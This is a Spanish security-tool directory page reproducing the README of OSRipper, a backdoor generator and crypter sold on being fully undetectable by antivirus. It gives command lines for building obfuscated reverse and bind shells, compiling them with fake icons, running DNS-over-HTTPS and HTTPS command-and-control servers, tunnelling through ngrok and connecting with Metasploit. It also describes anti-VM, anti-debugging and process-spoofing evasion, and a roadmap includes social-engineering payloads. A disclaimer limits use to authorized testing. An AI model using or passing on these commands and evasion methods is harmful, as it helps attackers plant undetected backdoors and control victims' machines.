Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OSRipper — Framework de Backdoor y Cifrado multiplataforma que evade AV con una webUI ligera integrada. | Kitploit
Herramientas/GitHubGitHub/noahoksuz/osripper
Frameworks de ExploitsGeneración de PayloadsEvasión de IDS/IPSPost-ExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed Teaming
GitHubnoahoksuz/osripper

OSRipper

Framework de Backdoor y Cifrado multiplataforma que evade AV con una webUI ligera integrada.

Ver Repositorio
32850hace 6 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

OSRipper v0.4.2

Logotipo de OSRipper

CodeFactor Python Version License Platform

Generador y encriptador de payloads multiplataforma avanzado con capacidades FUD

Características • Inicio Rápido • Interfaz Web • Tipos de Payload • Documentación


Resumen

OSRipper es un generador y encriptador de backdoors sofisticado y completamente indetectable (FUD), diseñado para pruebas de penetración autorizadas y operaciones de equipo rojo. Cuenta con técnicas de evasión avanzadas, múltiples tipos de payload y una interfaz C2 moderna basada en web para gestionar sistemas comprometidos.

Aspectos Destacados

  • Completamente Indetectable (FUD) - Técnicas de evasión avanzadas que sortean las soluciones AV modernas
  • Interfaz C2 Basada en Web - Panel de control moderno para gestionar sesiones activas
  • Múltiples Tipos de Payload - Bind shells, reverse shells, DoH C2, HTTPS C2 y más
  • Ofuscación Multicapa - Ofuscación estándar y mejorada con variables aleatorizadas
  • Compilación de Binarios - Compila payloads en ejecutables independientes
  • Comunicaciones Cifradas - Canales C2 SSL/TLS y HTTPS con fijación de certificados
  • Funciones Sigilosas - Detección de VM, anti-debugging, suplantación de procesos

Características

Generación de Payloads

Técnicas de Evasión

  • Ofuscación Avanzada - Codificación de código multicapa con variables aleatorias
  • Ofuscación Mejorada - Anti-debug, detección de VM, inyección de código basura
  • Detección Anti-VM - Evasión de sandboxes y máquinas virtuales
  • Demoras Sigilosas - Retardos aleatorios al inicio (5-15 segundos)
  • Suplantación de Procesos - Disfrazarse como procesos legítimos del sistema
  • Aleatorización de Firmas - Cada payload es único

Características de la Interfaz Web

  • Panel de Sesiones - Ver todas las sesiones C2 activas
  • Terminal Interactiva - Ejecutar comandos a través de la interfaz web
  • Generador de Payloads - Generar payloads directamente desde la interfaz web
  • Gestión de Sesiones - Ver información del sistema, historial de comandos y gestionar sesiones
  • Actualizaciones en Tiempo Real - Ejecución de comandos y visualización de respuestas en vivo

Capacidades Avanzadas

  • Integración con Ngrok - Creación automática de túneles para IPs dinámicas
  • Fijación de Certificados - C2 HTTPS seguro con validación de certificados
  • Persistencia de Sesiones - Mantener conexiones a través de reinicios
  • Cola de Comandos - Poner en cola comandos para agentes desconectados
  • Análisis de Respuestas - Análisis automático de la salida de comandos

Inicio Rápido

Instalación

root@kitploit:~
# Clonar repositorio
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Instalar dependencias
pip3 install -r requirements.txt

# Instalar paquete
pip3 install -e .

Importante — ejecute la configuración para características opcionales (ngrok, compilación de binarios):
En muchos sistemas (especialmente Linux con un entorno Python gestionado externamente), debe ejecutar la configuración integrada para que las dependencias opcionales se instalen en el venv propio de OSRipper. Hágalo una vez después de la instalación:

root@kitploit:~
osripper-cli setup

Esto crea ~/.local/share/osripper/venv, instala pyngrok, nuitka y sandboxed allí, y todas las ejecuciones posteriores de osripper / osripper-cli los usarán automáticamente. Sin esto, --ngrok y --compile le pedirán que ejecute la configuración. Use osripper-cli setup --system solo si prefiere una instalación pip de sistema/usuario en lugar del venv.

Uso Básico

Modo Interactivo:

root@kitploit:~
osripper
# o
python3 -m osripper

Línea de Comandos:

root@kitploit:~
# Generar reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Generar payload DoH C2
osripper-cli doh -d example.com --obfuscate --compile

Interfaz Web:

root@kitploit:~
# Iniciar servidor C2 con interfaz web
python -m osripper.c2.server example.com --port 5000

# Acceder al panel en http://localhost:5000

Interfaz Web

OSRipper incluye una interfaz C2 moderna basada en web para gestionar sistemas comprometidos.

Características

  • Panel de Control - Visión general de todas las sesiones activas
  • Gestión de Sesiones - Ver información del sistema y ejecutar comandos
  • Generador de Payloads - Generar payloads DoH y HTTPS a través de la interfaz web
  • Historial de Comandos - Rastrear todos los comandos ejecutados y sus respuestas
  • Actualizaciones en Tiempo Real - Ejecución de comandos y visualización de respuestas en vivo

Iniciar el Servidor C2

root@kitploit:~
# Uso básico
python -m osripper.c2.server example.com

# Con HTTPS
python -m osripper.c2.server example.com --https

# Puerto personalizado
python -m osripper.c2.server example.com --port 8080

# Con certificado personalizado
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Acceder a la Interfaz Web

Una vez que el servidor esté en ejecución, acceda al panel en:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (si está habilitado)

Tipos de Payload

1. Bind Shell Backdoor

Abre un puerto en la máquina víctima y espera conexiones.

root@kitploit:~
osripper-cli bind -p 4444 --obfuscate --compile

Conexión:

root@kitploit:~
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter

Conexión reversa cifrada con SSL/TLS.

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Canal C2 sigiloso usando el protocolo DNS-over-HTTPS. Sortea muchas restricciones de red.

root@kitploit:~
# Generar payload
osripper-cli doh -d example.com --obfuscate --compile

# Iniciar servidor C2
python -m osripper.c2.server example.com

Características:

  • Comunicación sigilosa basada en DNS
  • Interfaz web para gestión de sesiones
  • Persistencia automática de sesiones
  • Cola de comandos para agentes desconectados

4. HTTPS C2 (Fijación de Certificados)

C2 HTTPS seguro con fijación de certificados para autenticación.

root@kitploit:~
# Generar payload (a través de la interfaz web o CLI)
# Iniciar servidor C2 con HTTPS
python -m osripper.c2.server example.com --https

# Obtener la huella digital del certificado
curl http://localhost:5000/api/cert-fingerprint

Características:

  • Fijación de certificados para seguridad
  • Comunicación HTTPS cifrada
  • Integración con la interfaz web
  • Gestión de sesiones

5. Payload por Etapas

Entrega web en múltiples etapas para mayor sigilo.

root@kitploit:~
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. Encriptador de Código Personalizado

Ofuscar y cifrar cualquier script de Python.

root@kitploit:~
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Interfaz de Línea de Comandos

Opciones Comunes

Ejemplos

root@kitploit:~
# Reverse shell con todas las funciones
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# DoH C2 con todas las funciones
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# Cifrado de script personalizado
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# Usar ngrok para IP dinámica
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Resultados de Detección

Últimos Escaneos de VirusTotal

  • Payload en Python: Tasa de detección 0/68
  • Binario Compilado: Tasa de detección 0/68

Resultado de antiscan

Resultados de Antiscan


Arquitectura

root@kitploit:~
┌─────────────────┐
│   Generated     │
│    Binary       │
└─────────────────┘
         │
         │ Execute
         ▼
┌──────────────────┐
│ Obfuscated       │
│ Dropper          │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 SERVER     │
│   (Web UI)      │
│                 │
└─────────────────┘
         │
         │ Command/Response
         ▼
┌─────────────────┐
│   Agent         │
│   Execution     │
└─────────────────┘

Capturas de Pantalla

Interfaz Principal

Panel de la Interfaz Web

Panel de la Interfaz Web


Configuración Avanzada

Integración con Ngrok

root@kitploit:~
# Generar payload con ngrok
osripper-cli reverse --ngrok -p 4444

# Siga las instrucciones para configurar el túnel
# Ejecute: ngrok tcp 4444

Iconos Personalizados

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

Niveles de Ofuscación

Ofuscación Estándar:

  • Codificación multicapa
  • Aleatorización de variables
  • Ofuscación de estructura de código

Ofuscación Mejorada:

  • Todas las funciones estándar
  • Técnicas anti-debugging
  • Detección de VM
  • Inyección de código basura
  • Evasión avanzada
root@kitploit:~
# Estándar
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# Mejorada
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

Configuración de HTTPS C2

root@kitploit:~
# 1. Iniciar servidor C2 con HTTPS
python -m osripper.c2.server example.com --https

# 2. Obtener huella digital del certificado
curl http://localhost:5000/api/cert-fingerprint

# 3. Generar payload con la huella digital (a través de la interfaz web)
# O usar la huella digital en la generación de su payload

Documentación

  • Wiki - Documentación completa
  • Guía de Uso - Instrucciones detalladas de uso
  • Referencia de API - Documentación para desarrolladores

Hoja de Ruta

Completado (v0.3.2)

  • Generación de payloads FUD (detección 0/68)
  • Interfaz C2 basada en web
  • Payload C2 DNS-over-HTTPS
  • HTTPS C2 con fijación de certificados
  • Motor de ofuscación multicapa
  • Sistema de gestión de sesiones
  • Cola y ejecución de comandos
  • Detección anti-VM
  • Suplantación de procesos

En Progreso

  • Módulos mejorados de post-explotación
  • Mecanismos avanzados de persistencia
  • Subida/descarga de archivos a través de la interfaz web
  • Soporte multi-usuario para el servidor C2

Planes Futuros

  • Técnicas de evasión impulsadas por IA
  • Infraestructura C2 basada en blockchain
  • Soporte para plataformas móviles
  • Payloads avanzados de ingeniería social

Contribuir

¡Aceptamos contribuciones de la comunidad de investigación en seguridad!

Cómo Contribuir

  1. Haga un fork del repositorio
  2. Cree una rama de funcionalidad (git checkout -b feature/amazing-feature)
  3. Confirme sus cambios (git commit -m 'Add amazing feature')
  4. Empuje la rama (git push origin feature/amazing-feature)
  5. Abra una Solicitud de Extracción (Pull Request)

Directrices de Desarrollo

  • Siga los estándares de codificación PEP 8
  • Agregue docstrings a todas las funciones
  • Pruebe en múltiples plataformas
  • Asegúrese de que las capacidades FUD se mantengan intactas

Agradecimientos

Un agradecimiento especial a la comunidad de investigación en seguridad y a estos proyectos:

  • htr-tech/PyObfuscate - Inspiración para la ofuscación
  • cedowens/SwiftBelt - Enumeración de macOS
  • Metasploit Framework - Manejo de payloads

Aviso Legal

IMPORTANTE: Esta herramienta se desarrolla con fines educativos y solo para pruebas de penetración autorizadas.

  • Uso Autorizado: Investigación en seguridad, pruebas de penetración, ejercicios de equipo rojo
  • Uso Prohibido: Acceso no autorizado, actividades maliciosas, fines ilegales

Los desarrolladores no son responsables del mal uso de este software. Los usuarios deben cumplir con todas las leyes y regulaciones aplicables.


Soporte

  • Reportes de Errores: Abrir un Issue
  • Solicitudes de Funcionalidades: Discusiones
  • Problemas de Seguridad: Contactar a los mantenedores de forma privada.
Descargar herramienta
Tipo de PayloadDescripciónCaso de Uso
Bind ShellAbre un puerto en la máquina víctimaAcceso directo cuando las conexiones reversas están bloqueadas
Reverse TCP MeterpreterConexión reversa cifrada con SSL/TLSPruebas de penetración estándar
DNS-over-HTTPS C2Canal C2 sigiloso basado en DoHSortear restricciones de red
HTTPS C2C2 HTTPS con fijación de certificadosCanal C2 seguro y autenticado
Payload por EtapasEntrega web en múltiples etapasDespliegue sigiloso mejorado
Encriptador de Código PersonalizadoOfuscar cualquier script de PythonCifrado de payload personalizado
OpciónDescripción
--obfuscateHabilitar ofuscación multicapa
--enhancedOfuscación mejorada (anti-debug, detección de VM)
--compileCompilar a binario independiente
--icon RUTAIcono personalizado para el binario compilado
--delayAñadir retardo aleatorio al inicio (5-15 segundos)
--output, -o NOMBRENombre del archivo de salida
--quiet, -qModo silencioso (salida mínima)